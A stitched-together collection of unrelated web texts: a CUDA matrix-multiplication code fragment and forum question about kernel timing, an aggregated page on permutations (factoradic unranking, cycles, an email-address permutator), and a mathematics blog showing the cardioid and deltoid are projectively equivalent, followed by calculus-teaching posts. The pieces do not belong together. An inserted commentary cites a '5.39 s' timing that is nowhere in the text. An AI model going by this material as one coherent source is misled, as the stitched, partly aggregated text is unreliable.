    cudaMalloc((void**)&d_A.elements, size);
    cudaMemcpy(d_A.elements, a_h.elements, size, cudaMemcpyHostToDevice);
    cudaMalloc((void**)&d_B.elements, size);
    cudaMemcpy(d_B.elements, b_h.elements, size, cudaMemcpyHostToDevice);
    cudaMalloc((void**)&d_C.elements, size);

    /* Launch the kernel in parallel on the graphics card */
    dim3 dimBlock(BLOCK_SIZE, BLOCK_SIZE);
    dim3 dimGrid(b_h.width / dimBlock.x, a_h.height / dimBlock.y);

    cudaEvent_t start, stop;
    float time;
    cudaEventCreate(&start);
    cudaEventCreate(&stop);
    cudaEventRecord(start, 0);   // start of the timed region

    MulMatKernel<<<dimGrid, dimBlock>>>(d_A, d_B, d_C);
    //MulMat(a_h, b_h, c_h);

    /* End of the execution-time measurement */
    cudaEventRecord(stop, 0);    // end of the timed region
    cudaEventSynchronize(stop);
    cudaEventElapsedTime(&time, start, stop);
    cudaEventDestroy(start);
    cudaEventDestroy(stop);

    // Print results
    printf("\n");
    printf("Elapsed time: %f ms\n", time);

    /* Transfer the result from the graphics card to the CPU */
    cudaMemcpy(c_h.elements, d_C.elements, size, cudaMemcpyDeviceToHost);
    cudaFree(d_A.elements);
    cudaFree(d_B.elements);
    cudaFree(d_C.elements);

    fprintf(fp3, "\n");
    for (int i = 0; i < MSIZE; i++) {
        for (int j = 0; j < MSIZE; j++) {
            if (c_h.elements[i*c_h.width + j] > MSIZE || c_h.elements[i*c_h.width + j] < 0)
                printf("error = %f i = %d, j = %d\n", c_h.elements[i*c_h.width + j], i, j);
            fprintf(fp3, "%f\n", c_h.elements[c_h.width*j + i]);
        }
    }

    fclose(fp1);
    fclose(fp2);
    fclose(fp3);

    // Cleanup
    free(a_h.elements);
    free(b_h.elements);
    free(c_h.elements);
}

__global__ void MulMatKernel(Matrix A, Matrix B, Matrix C)
{
    // Each thread computes one element of C by accumulating results into Cvalue
    float Cvalue = 0.0f;
    int row = blockIdx.y * blockDim.y + threadIdx.y;
    int col = blockIdx.x * blockDim.x + threadIdx.x;
    /* Compute and store in column-major order for Matlab */
    for (int e = 0; e < A.width; ++e)
        Cvalue += A.elements[row * A.width + e] * B.elements[e * B.width + col];
    C.elements[col * C.width + row] = Cvalue;
}
```

jcpao

These are the results I get from the profiler (see attached Excel document):
prof_mulmat3.xls (14 KB)

Hello,

I took the example of Cuda matrix multiplication using shared memory from the Programming Guide. I use two 1024 x 1024 matrices with 16 x 16 blocks. I use 8 registers per thread. I use a GPU 8400 GS with 8 stream processors (1400 MHz).

I get an execution time (for the kernel alone) of 387 ms.

Please could you tell me whether it is a slow or a normal execution time?
Thank you for your help. :)
jcpao
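For what it's worth, here is my own back-of-the-envelope conversion, not part of the original thread: a 1024 x 1024 x 1024 single-precision multiply performs about 2·1024³ ≈ 2.1 GFLOP, so a 387 ms kernel corresponds to roughly 5.5 GFLOPS, which does not look unreasonable for such a low-end 8-SP part; the 5.39 s figure earlier in the thread very likely includes context creation and host-side setup, as the second reply suggests. The constants below are just the numbers quoted above.

```cpp
#include <cstdio>

// Convert a measured kernel time for an n x n x n matrix multiply into an
// achieved-GFLOPS figure (counting one multiply and one add per inner step).
int main() {
    const double n  = 1024.0;   // matrix dimension used in the posts above
    const double ms = 387.0;    // measured kernel-only time in milliseconds
    const double flop = 2.0 * n * n * n;
    std::printf("%.2f GFLOPS\n", flop / (ms * 1e-3) / 1e9);  // about 5.5 GFLOPS
    return 0;
}
```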
http://pgamo.com/die-hard-ahuwa/d1f722-find-permutation-id
A permutation is an arrangement of objects in which the order is important (unlike combinations, which are groups of items where order does not matter). Permutations are the different arrangements that a set of elements can make when taken some or all at a time. For example, the string ABC has six permutations: ABC, ACB, BAC, BCA, CAB, CBA. To count the permutations of a word, simply evaluate n!, where n is the number of letters (assuming for now that the word has no duplicate letters): a 6-letter word has 6! = 6·5·4·3·2·1 = 720 different permutations. The total number of permutations of a string of N distinct characters is N!; if a character C1 occurs M1 times, C2 occurs M2 times, and so on up to Ck occurring Mk times, the count becomes N!/(M1!·M2!·...·Mk!). The number of permutations of n things taken r at a time is nPr = n!/(n-r)!, and the number of permutations with repetition (choosing r times from n things with replacement) is n^r; for example, choosing two balls with replacement from an urn containing a red, a blue and a black ball gives the nine ordered outcomes {red,red}, {red,blue}, {red,black}, {blue,red}, {blue,blue}, {blue,black}, {black,red}, {black,blue}, {black,black}. A permutation-combination calculator is a convenient tool for computing these counts with or without repetition.

In English we use the word "combination" loosely, without thinking whether the order of things is important. "My fruit salad is a combination of apples, grapes and bananas": we do not care what order the fruits are in; "bananas, grapes and apples" is the same fruit salad. When listing combinations subject to conditions, three kinds of rules come up:

- The "has" rule (the word "has" followed by a number and a list of items) says that at least that many of the listed items must be included. Example: "has 2,a,b,c" means an entry must contain at least two of the letters a, b and c, so {a,b,f} is accepted but {a,e,f} is rejected.
- The "no" rule (the word "no" followed by a number and a list of items) says how many of the listed items are enough for a rejection. Example: "no 2,a,b,c" means an entry must not contain two or more of the letters a, b and c, so {a,d,e} is allowed but {b,c,d} is rejected.
- The "pattern" rule imposes some kind of order on each entry. Example: "pattern c,*" means the letter c must come first and anything else can follow.

A question that comes up repeatedly (originally asked on Stack Overflow) is the following: "I am using permutations to turn a string, character by character, into 'helloworld!'. It works, but it took 176,791 permutations to get there, and even without any printf or cout it takes minutes. Is there a way to simply input 176791 and quickly permutate (rotate, swap, etc.) straight to that permutation?" One answer points out that you only know the number 176791 because you did the full iteration in the first place, and that there is nothing in the math world that can direct permutations toward legible words. The more useful observation is that this is really a question about encoding a permutation by an integer, which is a well-researched subject (search for fast permutation-to-number and number-to-permutation mapping algorithms). Different encodings will use different integers for the same permutation, and an encoding need not be synchronized with the sequence produced by repeated calls to std::next_permutation.

If no specific encoding method is required, any permutation of N elements can be encoded as follows. Take the canonical representation of the permutation: an array of N indexes that describes the new position of each element, i.e. index[old position] = new position. Then interpret that array as an N-digit number in base N (if N is a power of 2, this simply packs the array into a bit-array). A valid permutation never repeats a value in its index array, so this representation is excessive: it spends more bits than necessary, since it could also encode index arrays with repeated values; it is also not well-constructed in another small way, because the identity permutation potentially has zero size. Properly constructed encodings, such as the factorial number system (factoradics, also called the Lehmer code), occupy the same number of bits for every permutation.

The factorial number system also answers the "jump to the k-th permutation" question directly. To find the 14th permutation of 'abcd' (counting from 0 in lexicographic order), write 14 in factoradics: 14 = 2·3! + 1·2! + 0·1! + 0·0!, i.e. 2100. Start with the first digit, 2: it selects the third of the remaining characters of 'abcd', and the later digits select from whatever is left, giving cbad. The same idea solves the classic exercise "given integers N and K, find the K-th permutation sequence of the numbers 1 to N without using STL functions" (the inputs are assumed to be such that the K-th permutation exists): for N = 3 and K = 4 the ordered list is 123, 132, 213, 231, 312, 321, so the answer is 231. A related exercise, "Find Permutation", gives a string s of n-1 letters D and I, where 'D' represents a decreasing relationship between two adjacent numbers and 'I' an increasing one, and asks for any permutation of the first n positive integers that satisfies it, in linear time and space. A sketch of the factoradic unranking idea appears below.

For generating all permutations rather than jumping to one, the usual tools are std::next_permutation in C++, the itertools package in Python (which provides permutations and combinations of a sequence), recursive generation that swaps each of the remaining characters of the string in turn (for example, a C program that permutes all letters of a string without recursion using pointers, or one that prints all permutations of a string without duplicates), and Heap's algorithm; in a 1977 review of permutation-generating algorithms, Robert Sedgewick concluded that Heap's method was at that time the most effective algorithm for generating permutations by computer.

A few group-theoretic facts also come up. The order of a permutation σ of {1, 2, ..., n} is the smallest positive integer m such that σ^m = ε, where ε is the identity permutation. The identity permutation id_n satisfies f∘id_n = id_n∘f = f for every permutation f, and the inverse of a permutation f is the inverse function f⁻¹; a convenient feature of cycle notation is that the inverse is found simply by reversing the order of the elements in each cycle. A permutation cycle is a set of elements that trade places with one another: for P = {5, 1, 4, 2, 3}, where 5 goes to 1, 1 goes to 2, 2 goes to 4, 4 goes to 3 and 3 goes to 5, the permutation is the single cycle (5, 1, 2, 4, 3). Since each permutation π is a bijection, one can always construct an inverse permutation π⁻¹ with π∘π⁻¹ = id. In R's permutations package the identity is stored as a cycle (this is more convenient than a zero-by-one word matrix), and is.id() returns TRUE exactly for identity elements, dispatching to is.id.cycle() or is.id.word() as appropriate. A typical exercise: find all permutations α in S₇ such that α³ = (1234). There is more than one such permutation, since α could be a 4-cycle on the elements 1, 2, 3, 4, possibly together with a 3-cycle on 5, 6, 7; α cannot involve a disjoint transposition, since (ij)³ = (ij).

Finally, "permutation" also shows up in more mundane tools. An email permutator works in three steps: Step 1, enter name information for your contact, including nickname (Jeff vs Jeffery) and middle name or initial if available; Step 2, enter up to three domains at which this contact is likely to have an email address; Step 3, click "Permutate" and copy the resulting email addresses. A similar small scripting task: given a 13-digit alphanumeric code such as 00SHGO8BJIDG0, interchange S with 5, I with 1 and O with 0, and vice versa.
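To make the unranking idea concrete, here is a small C++ sketch of my own (the function name kthPermutation is hypothetical, not from any of the sources above). It builds the k-th permutation of a set of distinct characters directly from the factorial number system, so jumping to a large index costs a handful of operations instead of that many calls to std::next_permutation. For distinct elements starting from the sorted string, index k here agrees with applying std::next_permutation k times; for a string with repeated letters such as "helloworld!" the lexicographic ranking has to account for duplicates, so the index would be a different number.

```cpp
#include <algorithm>
#include <cstdint>
#include <iostream>
#include <string>
#include <vector>

// Return the k-th (0-based, k < n!) permutation, in lexicographic order,
// of the sorted characters of `symbols`, assuming all characters are distinct.
std::string kthPermutation(std::string symbols, std::uint64_t k) {
    std::sort(symbols.begin(), symbols.end());

    // Factorials up to the number of symbols.
    std::vector<std::uint64_t> fact(symbols.size() + 1, 1);
    for (std::size_t i = 1; i < fact.size(); ++i) fact[i] = fact[i - 1] * i;

    std::string result;
    while (!symbols.empty()) {
        std::uint64_t block = fact[symbols.size() - 1];            // permutations per leading symbol
        std::size_t digit = static_cast<std::size_t>(k / block);   // factoradic digit
        k %= block;
        result += symbols[digit];                 // pick that symbol...
        symbols.erase(symbols.begin() + digit);   // ...and remove it from the pool
    }
    return result;
}

int main() {
    // The 14th (0-based) permutation of "abcd": factoradic digits 2,1,0,0 -> "cbad".
    std::cout << kthPermutation("abcd", 14) << "\n";
}
```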
https://thalestriangles.blogspot.com/
Monday, July 15, 2019

cardioid, deltoid, folium

The cardioid and the deltoid are two of my favorite curves. They arise in similar ways: one is an epicycloid, and the other is a hypocycloid. In a sense, each is the simplest non-trivial example of their respective type. They make excellent examples for calculus problems. But as I learned this week, they are actually the same curve.

This post is about the claim made in italics in the previous paragraph. Obviously I don't mean that the classical constructions mentioned above (and described below) produce the same curves in the Euclidean plane. Rather, they are the same from the perspective of complex projective geometry. When I searched for this fact on Google after uncovering it for myself, I only found one mention of it, in a textbook from 1923 entitled An Introduction to Projective Geometry. I assume it was well-known at the time, and today is probably known to certain algebraic geometers, but it seems worth explicating for a larger audience.

First, the curves. Epicycloids and hypocycloids are both examples of roulettes, curves traced out by a point marked on one curve, which is free to move, as it rolls along another curve, which is fixed, without slipping. To generate an epicycloid or hypocycloid, both the fixed curve and the moving curve are circles; the difference is that for an epicycloid, the rolling circle is outside the fixed circle, and for a hypocycloid the rolling circle is on the inside. The shape of the epicycloid or hypocycloid is determined by the ratio of the circles' radii. For an epicycloid, we can choose a 1:1 ratio, which means the marked point on the rolling circle makes contact with the fixed circle once as the outer circle completes a circuit. A hypocycloid cannot be constructed from circles whose radii have a 1:1 ratio, and a 2:1 ratio simply produces a line segment, so the simplest hypocycloid arises from a 3:1 ratio. The construction of these simplest examples is illustrated below. (These animations were created using a Desmos graph with the help of GIFsmos.) The first is called the cardioid ("heart-like") and the second is the deltoid ("triangle-like").

In both cases, the rolling circle is given a radius of 1, and in both cases the centers of the two circles remain at a distance of 2. By watching carefully, one can see that in both cases the marked point makes two revolutions around the center of the rolling circle. For the cardioid, these revolutions are counterclockwise, and so the cardioid can be parameterized by $(2\cos\theta + \cos2\theta,\ 2\sin\theta + \sin2\theta)$. In the case of the deltoid, the marked point's revolutions are made clockwise, and so the deltoid can be parameterized by $(2\cos\theta + \cos2\theta,\ 2\sin\theta - \sin2\theta)$. These formulas are very similar, but certainly not the same, and the pictures they produce are quite different. So how can I claim that the curves are the same?

Our first step toward understanding the claim involves switching to complex numbers. If we collect the $x$- and $y$-coordinates of the plane $\mathbb{R}^2$ into a single complex coordinate, then the parameterizations above become

$2e^{i\theta} + e^{2i\theta}$ and $2e^{i\theta} + e^{-2i\theta}$.

Now we want to extend to the complex plane $\mathbb{C}^2$ (note: I think of $\mathbb{C}$ as the complex line because it is one-dimensional as a complex vector space).
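Before going further, here is a quick numerical check of my own (not part of the original post) that the complex expressions above really do trace the same curves as the real parameterizations given earlier; it simply compares the two forms at a few hundred sample angles.

```cpp
#include <algorithm>
#include <cmath>
#include <complex>
#include <cstdio>

int main() {
    const double pi = std::acos(-1.0);
    double max_err_c = 0.0, max_err_d = 0.0;

    for (int k = 0; k < 360; ++k) {
        double theta = 2.0 * pi * k / 360.0;
        std::complex<double> e1 = std::polar(1.0, theta);        // e^{i theta}
        std::complex<double> e2 = std::polar(1.0, 2.0 * theta);  // e^{2 i theta}

        // Complex forms of the two curves.
        std::complex<double> zc = 2.0 * e1 + e2;                 // cardioid
        std::complex<double> zd = 2.0 * e1 + std::conj(e2);      // deltoid, e^{-2 i theta}

        // Real parameterizations from the text, packed as x + iy.
        std::complex<double> zc_real(2.0*std::cos(theta) + std::cos(2.0*theta),
                                     2.0*std::sin(theta) + std::sin(2.0*theta));
        std::complex<double> zd_real(2.0*std::cos(theta) + std::cos(2.0*theta),
                                     2.0*std::sin(theta) - std::sin(2.0*theta));

        max_err_c = std::max(max_err_c, std::abs(zc - zc_real));
        max_err_d = std::max(max_err_d, std::abs(zd - zd_real));
    }
    std::printf("max deviation: cardioid %.2e, deltoid %.2e\n", max_err_c, max_err_d);
    return 0;
}
```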
A standard trick is to add a second coordinate that is conjugate to the first, which makes the parameterizations

$\big(2e^{i\theta} + e^{2i\theta},\ 2e^{-i\theta} + e^{-2i\theta}\big)$ and $\big(2e^{i\theta} + e^{-2i\theta},\ 2e^{-i\theta} + e^{2i\theta}\big)$.

Now let's set $t = e^{i\theta}$ and allow $t$ to take on all complex values (except $0$, but we'll take care of that later) instead of just values on the unit circle. At the same time, let's label the parameterizations $\gamma_C$ and $\gamma_D$, with $C$ standing for cardioid and $D$ for deltoid. This gives us

$\gamma_C(t) = \left(2t + t^2,\ \frac{2}{t} + \frac{1}{t^2}\right)$ and $\gamma_D(t) = \left(2t + \frac{1}{t^2},\ \frac{2}{t} + t^2\right)$.

We still can see superficial similarities in these formulas, but not enough to conclude that they define equivalent curves. In order to see their equivalence, we need to see what's happening at infinity, which means introducing some projective geometry.

The complex projective line $\mathbb{P}^1$, also known as the Riemann sphere, is obtained by adding a single point, labeled $\infty$, to the ordinary complex line $\mathbb{C}$. The points of $\mathbb{P}^1$ may be thought of as the "slopes" of lines through the origin in $\mathbb{C}^2$. Indeed, it is often useful to assign coordinates to $\mathbb{P}^1$ using non-zero vectors $(s,t)$ in $\mathbb{C}^2$, where two vectors correspond to the same point of $\mathbb{P}^1$ if they are scalar multiples of each other, $(s,t)\sim(\lambda s,\lambda t)$ if $\lambda\in\mathbb{C}\setminus\{0\}$. We write the equivalence class of $(s,t)$ as $[s:t]$; these are called homogeneous coordinates on $\mathbb{P}^1$. We can recover $\mathbb{P}^1$ as $\mathbb{C}\cup\{\infty\}$ by sending $[s:t]$ to the slope $t/s$ if $s \ne 0$; then $[0:1]$ is sent to $\infty$.

In a similar way, we can extend $\mathbb{C}^2$ to the complex projective plane $\mathbb{P}^2$ by adding points at infinity, and the most convenient way to do so is by homogeneous coordinates. We start with non-zero vectors $(u,v,w)$ in $\mathbb{C}^3$ and consider $(\lambda u, \lambda v, \lambda w)$ to define the same point of $\mathbb{P}^2$ as $(u,v,w)$ if $\lambda\in\mathbb{C}\setminus\{0\}$. Then $[u:v:w]$ are homogeneous coordinates on $\mathbb{P}^2$. The points with $u\ne0$ correspond to points of the original complex plane $\mathbb{C}^2$, by sending $[u:v:w]$ to $(v/u,w/u)$. The points with $u=0$ constitute the new line at infinity, which is just a copy of $\mathbb{P}^1$ with coordinates $[0:v:w]$.

Now we can extend the cardioid and the deltoid to curves in $\mathbb{P}^2$, not just $\mathbb{C}^2$. We start with the parameterizations $\gamma_C$ and $\gamma_D$, append an initial coordinate of 1, then clear denominators (we can do this because of the equivalence that defines homogeneous coordinates).
Then we get

$\gamma_C(t) = \big[t^2 : 2t^3 + t^4 : 2t + 1\big]$ and $\gamma_D(t) = \big[t^2 : 2t^3 + 1 : 2t + t^4\big]$.

These allow for the possibility of $t = 0$, but apparently leave out the point at infinity $\infty$, so we make one more modification, replacing $t$ with $t/s$ and again clearing denominators to obtain

$\gamma_C([s:t]) = \big[s^2 t^2 : 2st^3 + t^4 : 2s^3t + s^4\big]$ and $\gamma_D([s:t]) = \big[s^2t^2 : 2st^3 + s^4 : 2s^3t + t^4\big]$.

Here we see a feature characteristic of maps from one projective space to another, when homogeneous coordinates are used: each component of the map must be homogeneous of the same degree (in this case, four). By expressing the parameterizations of the cardioid and the deltoid in this way, we see that both curves touch the line at infinity at the two points $[0:1:0]$ and $[0:0:1]$, corresponding to $[0:1]$ and $[1:0]$, respectively, for the cardioid, and in the reverse order for the deltoid. Still this isn't enough to show that the curves are the same! We need one more ingredient.

A projective transformation of $\mathbb{P}^1$ or $\mathbb{P}^2$ is induced by a linear transformation of the homogeneous coordinates. Readers who are already familiar with the Riemann sphere will recognize projective transformations of $\mathbb{P}^1$ as Möbius transformations (also known as fractional linear transformations): given $a,b,c,d\in\mathbb{C}$, we can convert $[s:t] \mapsto [as+bt:cs+dt]$ to a Möbius transformation in the coordinate $z = s/t$, where it becomes $z \mapsto \frac{az+b}{cz+d}$. The condition for this function to be invertible is $ad - bc \ne 0$, which is the same as the condition for the matrix $\begin{bmatrix} a & b \\ c & d \end{bmatrix}$ to be invertible. In the same way, projective transformations of $\mathbb{P}^2$ arise from invertible linear transformations of $\mathbb{C}^3$. Two objects in $\mathbb{P}^1$ or $\mathbb{P}^2$ are called projectively equivalent if there is a projective transformation that carries one to the other. And now we can state precisely what was meant in the opening paragraph:

The cardioid and the deltoid are projectively equivalent in $\mathbb{P}^2$.

But how do we find the projective equivalence? A clue may be found in one clear difference between the original curves drawn in the Euclidean plane, which niggled at me while I was trying to figure out their relationship. The deltoid clearly has three cusps, while the cardioid apparently only has one. If the curves are equivalent, where are the other cusps of the cardioid? The answer: on the line at infinity!

How can we tell? It's time to apply some differential geometry and look at the tangent lines of these two curves. Returning to the parameterizations in terms of $t$, we find

$\gamma_C'(t) = \left(2 + 2t,\ -\frac{2}{t^2} - \frac{2}{t^3}\right)$ and $\gamma_D'(t) = \left(2 - \frac{2}{t^3},\ -\frac{2}{t^2} + 2t\right)$.

Now a line in $\mathbb{C}^2$, with coordinates $(v,w)$, passing through $(a,b)$ in the direction $(s,t)$ has the equation $\begin{vmatrix} s & v - a \\ t & w - b \end{vmatrix} = 0$. Thus the tangent line to the cardioid at $\gamma_C(t)$ has the equation $\begin{vmatrix} 2 + 2t & v - (2t + t^2) \\ -\frac{2}{t^2} - \frac{2}{t^3} & w - (\frac{2}{t} + \frac{1}{t^2}) \end{vmatrix} = 0$ which, after some simplification, becomes $wt^3 - 3t^2 - 3t + v = 0$. This is the line equation of the cardioid.
In a similar fashion, we can find the line equation of the deltoid, which is $t^3 - vt^2 + wt - 1 = 0$.

Having the line equation of a curve, in terms of a parameter $t$, can be useful in several ways. As $t$ varies over $\mathbb{P}^1$, it produces all the tangent lines of the curve. (We'll clarify what happens when $t = \infty$ in a moment.) But we can also let $(v,w)$ vary over $\mathbb{C}^2$ and find, for each point, which tangent lines of the curve pass through that point. Because the line equations of the cardioid and the deltoid are cubic polynomials in $t$, most points of $\mathbb{C}^2$ will lie on three tangent lines. Those points that lie on fewer than three tangent lines play a special role.

Let's illustrate first with the deltoid. We'll be looking at lots of cube roots, so let $\omega = e^{i\,2\pi/3}$; this means that $\omega^3 = 1$ and $1 + \omega + \omega^2 = 0$. When $(v,w)=(0,0)$, the line equation becomes $t^3 - 1 = 0$, so the tangent lines of the deltoid that pass through the origin correspond to the parameters $1$, $\omega$, and $\omega^2$. Indeed, the three points $\gamma_D(1) = (3,3)$, $\gamma_D(\omega) = (3\omega,3\omega^2)$, and $\gamma_D(\omega^2) = (3\omega^2,3\omega)$ are the three cusps of the deltoid. On the other hand, a point that belongs to the deltoid lies on tangent lines corresponding to at most two parameters (two of the points of tangency have "coalesced"). For example, when $(v,w)=(-1,-1)$, the line equation becomes $t^3 + t^2 - t - 1 = 0$, or $(t+1)^2(t-1) = 0$. At a cusp, all three tangent lines coincide: for example, when $(v,w)=(3,3)$, the line equation is $t^3 - 3t^2 + 3t - 1 = (t-1)^3 = 0$. See the pictures below.

We can homogenize the line equation of the deltoid by replacing $t$ with $t/s$ and $(v,w)$ with $(v/u,w/u)$ and clearing denominators to obtain $ut^3 - vst^2 + ws^2t - us^3 = 0$. When $[s:t] = [1:0]$ or $[0:1]$ (remember, this second point in homogeneous coordinates corresponds to $t=\infty$), we get the same equation of the tangent line, $u = 0$. This is the equation of the line at infinity, so the line at infinity is tangent to the deltoid at both $[0:0:1]$ and $[0:1:0]$! A line that is tangent to a curve at two points is called a bitangent.

The cardioid also has a bitangent, which is easier to see: when $t = \omega$ or $t = \omega^2$, respectively, the line equation of the cardioid becomes $w - 3\omega^2 - 3\omega + v = 0$ or $w - 3\omega - 3\omega^2 + v = 0$, both of which are equivalent to $v + w = -3$. The visible cusp occurs at $(-1,-1)$, where the line equation becomes $(t + 1)^3 = 0$. For an example of more generic behavior, look at $(-3,-3)$, where the line equation becomes $3t^3 + 3t^2 + 3t + 3 = 0$, or $3(t + 1)(t + i)(t - i) = 0$. See pictures below.

The homogeneous version of the cardioid's line equation is $wt^3 - 3ust^2 - 3us^2t + vs^3 = 0$. When $[s:t] = [1:0]$, this becomes the $w$-axis $v = 0$, and when $[s:t] = [0:1]$, we get $w = 0$. In each of these cases, we see that only one tangent line passes through the point, just as we saw for the cusps of the deltoid. So we have identified the three cusps of the cardioid: $[1:-1:-1]$, $[0:0:1]$, and $[0:1:0]$. The tangent lines through all three of these cusps pass through the origin in $\mathbb{C}^2$, with homogeneous coordinates $[1:0:0]$.

We now have enough information to show the equivalence of the cardioid and the deltoid.
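Before carrying out that construction, here is a quick numerical check of my own (not from the original post) of the tangency counts just described: it evaluates the two line equations at the parameters named above, and every residual prints as zero up to rounding. The point $(-1,-2)$ is just an arbitrary point chosen on the bitangent $v + w = -3$.

```cpp
#include <cmath>
#include <complex>
#include <cstdio>

using C = std::complex<double>;

// Deltoid line equation: t is a root exactly when the tangent line at
// gamma_D(t) passes through the point (v, w).
C deltoidLine(C t, C v, C w)  { return t*t*t - v*t*t + w*t - 1.0; }

// Cardioid line equation from the text: w t^3 - 3 t^2 - 3 t + v.
C cardioidLine(C t, C v, C w) { return w*t*t*t - 3.0*t*t - 3.0*t + v; }

int main() {
    const C omega(-0.5, std::sqrt(3.0) / 2.0);  // primitive cube root of unity

    // Deltoid: three tangent lines through the origin, touching at t = 1, omega, omega^2.
    std::printf("%.1e %.1e %.1e\n",
                std::abs(deltoidLine(1.0, 0.0, 0.0)),
                std::abs(deltoidLine(omega, 0.0, 0.0)),
                std::abs(deltoidLine(omega * omega, 0.0, 0.0)));

    // Deltoid: (-1,-1) lies on the curve (double root t = -1, simple root t = 1);
    // (3,3) is a cusp (triple root t = 1).
    std::printf("%.1e %.1e %.1e\n",
                std::abs(deltoidLine(-1.0, -1.0, -1.0)),
                std::abs(deltoidLine(1.0, -1.0, -1.0)),
                std::abs(deltoidLine(1.0, 3.0, 3.0)));

    // Cardioid: the visible cusp at (-1,-1) gives a triple root t = -1, and the
    // bitangent parameters t = omega, omega^2 give lines through (-1,-2).
    std::printf("%.1e %.1e %.1e\n",
                std::abs(cardioidLine(-1.0, -1.0, -1.0)),
                std::abs(cardioidLine(omega, -1.0, -2.0)),
                std::abs(cardioidLine(omega * omega, -1.0, -2.0)));
    return 0;
}
```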
To define a projective transformation from $\\mathbb{P}^1$ to itself, we need to specify where three points go; to define a projective transformation from $\\mathbb{P}^2$ to itself, we need to specify the images of four points, no three of which are collinear. We’ll show how to transform the line equation of the deltoid into the line equation of the cardioid via pullback.\n\nWe’re looking for projective transformations $f : \\mathbb{P}^1 \\to \\mathbb{P}^1$ and $g : \\mathbb{P}^2 \\to \\mathbb{P}^2$ such that $\\gamma_D \\circ f = g \\circ \\gamma_C$. Starting with $f$, we require\n\n$f\\big([1:0]\\big) = [1:\\omega]$,   $f\\big([0:1]\\big) = [\\omega:1]$,   and   $f\\big([1:-1]\\big) = [1:1]$,\nso that the parameters of the cardioid’s cusps are sent to those of the deltoid’s cusps. This can be accomplished by defining $f\\big([s:t]\\big) = [s - \\omega t : \\omega s - t]\\text.$ Meanwhile, $g$ needs to satisfy\n$g\\big([0:0:1]\\big) = [1:3\\omega:3\\omega^2]$,  $g\\big([0:1:0]\\big) = [1:3\\omega^2:3\\omega]$,\n$g\\big([1:-1:-1]\\big) = [1:3:3]$,   and   $g\\big([1:0:0]\\big) = [1:0:0]$,\nwhich is accomplished by $g\\big([u:v:w]\\big) = [ 3u+v+w : 3\\omega^2 v + 3\\omega w : 3\\omega v + 3\\omega^2 w ]\\text.$ Now substitute the components of $f$ and $g$ into the variables of the deltoid’s line equation, expand, and simplify. The result is the line equation of the cardioid. You can calculate this by hand, or just let SageMath do it for you:\n\nOne of the curves mentioned in the title of this post has been conspicuously absent so far: the folium of Descartes. This is another favorite curve of mine, invariably given in my calculus classes as an exercise in implicit differentiation. Its equation is $x^3 + y^3 = xy$.\n\nSo what’s the connection between this curve and the others? Well, if we extract the coefficients from the deltoid’s line equation and use them to define a new curve $\\gamma_F$, we get $\\gamma_F\\big([s:t]\\big) = [ s^3 - t^3 : st^2 : -s^2 t ]\\text,$ which parameterizes $v^3 + w^3 = uvw\\text,$ the homogeneous version of the folium’s equation. This means that the folium is dual to the deltoid (and thus also to the cardioid)! The tangent lines of the cardioid/deltoid have been converted into points of the folium, and likewise points of the cardioid/deltoid become tangent lines of the folium. Just as each point of $\\mathbb{C}^2$ lies on three tangent lines of the cardioid/deltoid, counted with multiplicity, each line of $\\mathbb{C}^2$ intersects the folium at three points, counted with multiplicity. The bitangent of the deltoid and cardioid has been converted into a point of self-intersection. If we look at points of the form $[1:v:\\bar{v}]$, then the threefold symmetry of the folium is revealed (the three asymptotic directions correspond to the three tangent lines that pass through the origin, which as we saw are the tangent lines at the cusps).\n\nSaturday, December 29, 2018\n\nan IBL preface\n\nIn just over a week, I will distribute to students the first piece of the complex variables notes I have been writing. Here is a preface to be included with the notes, to motivate the IBL structure. The details of the class will be spelled out in the syllabus; this is just to set the tone.\n\nYou are the creators. These notes are a guide.\n\nThe notes will not show you how to solve all the problems that are presented, but they should enable you to find solutions, on your own and working together. 
They will also provide historical and cultural background about the context in which some of these ideas were conceived and developed. You will see that the material you are about to study did not come together fully formed at a single moment in history. It was composed gradually over the course of centuries, with various mathematicians building on the work of others, improving the subject while increasing its breadth and depth.\n\nMathematics is essentially a human endeavor. Whatever you may believe about the true nature of mathematics—does it exist eternally in a transcendent Platonic realm, or is it contingent upon our shared human consciousness? is math “invented” or “discovered”?—our experience of mathematics is temporal, personal, and communal. Like music, mathematics that is encountered only on as symbols on a page remains inert. Like music, mathematics must be created in the moment, and it takes time and practice to master each piece. The creation of mathematics takes place in writing, in conversations, in explanations, and most profoundly in the mental construction of its edifices on the basis of reason and observation.\n\nTo continue the musical analogy, you might think of these notes like a performer’s score. Much is included to direct you towards particular ideas, but much is missing that can only be supplied by you: participation in the creative process that will make those ideas come alive. Moreover, the success of the class will depend on the pursuit of both individual excellence and collective achievement. Like a musician in an orchestra, you should bring your best work and be prepared to blend it with others’ contributions.\n\nIn any act of creation, there must be room for experimentation, and thus allowance for mistakes, even failure. A key goal of our community is that we support each other—sharpening each other’s thinking but also bolstering each other's confidence—so that we can make failure a productive experience. Mistakes are inevitable, and they should not be an obstacle to further progress. It’s normal to struggle and be confused as you work through new material. Accepting that means you can keep working even while feeling stuck, until you overcome and reach even greater accomplishments.\n\nThese notes are a guide. You are the creators.\n\nMonday, September 03, 2018\n\n2018 calculus syllabus\n\nIn my last post, I explained a bit about how I feel like my syllabus is a work-in-progress, even though the semester has started and I’m already using it. In this post I’ll give some more details and even more history. I’ll quote extensively from my syllabus verbatim; here is a link to the entire thing for anyone who is interested.\n\nRevising my syllabus for this semester really began last fall. I wasn’t entirely blind to the faults that were starting to show. One major change was in restructuring the exam schedule. When I switched to standards-based grading in calculus 1, I also started weekly quizzes (which students took on their own time outside of class) and had three midterm exams plus a final. The quizzes functioned as a sort of preliminary assessment for most of the standards. Each test covered about eight standards. After the third test, there were a couple more standards we covered in class, which were only assessed on a quiz and the final exam. Even with three midterms, however, I had often felt like students were rushed in completing them. I also began to question the value of the out-of-class quizzes. 
So I turned the quizzes into “labs” that students were free to collaborate on, and I switched from three midterm exams to five, which would formally assess every standard before the final.\n\nI really liked how having five midterms broke up the material. Each test became more coherent in the material it included. Exam 1 covered limits. Exam 2, definition and interpretation of derivatives. Exam 3, rules for differentiation. Exam 4, applications of derivatives. Exam 5, definition of integrals and the Fundamental Theorem of Calculus. Especially helpful was splitting up the applications of derivatives (l'Hospital's rule, optimization, related rates, and so on) from the introduction to integrals; these topics had usually been all jumbled together in the last midterm, compounding the difficulty already created by it being late in the sester. Also, by dedicating one test just to derivative rules, I was moving towards having a Differentiation Gateway Exam, as several of my colleagues at Pepperdine use. And paired with that move was an awareness that I was gravitating towards a specifications framework.\n\nThis fall, I decided to maintain the five-midterm structure and get rid of the quizzes/labs, to be replaced by an occasional more substantial homework 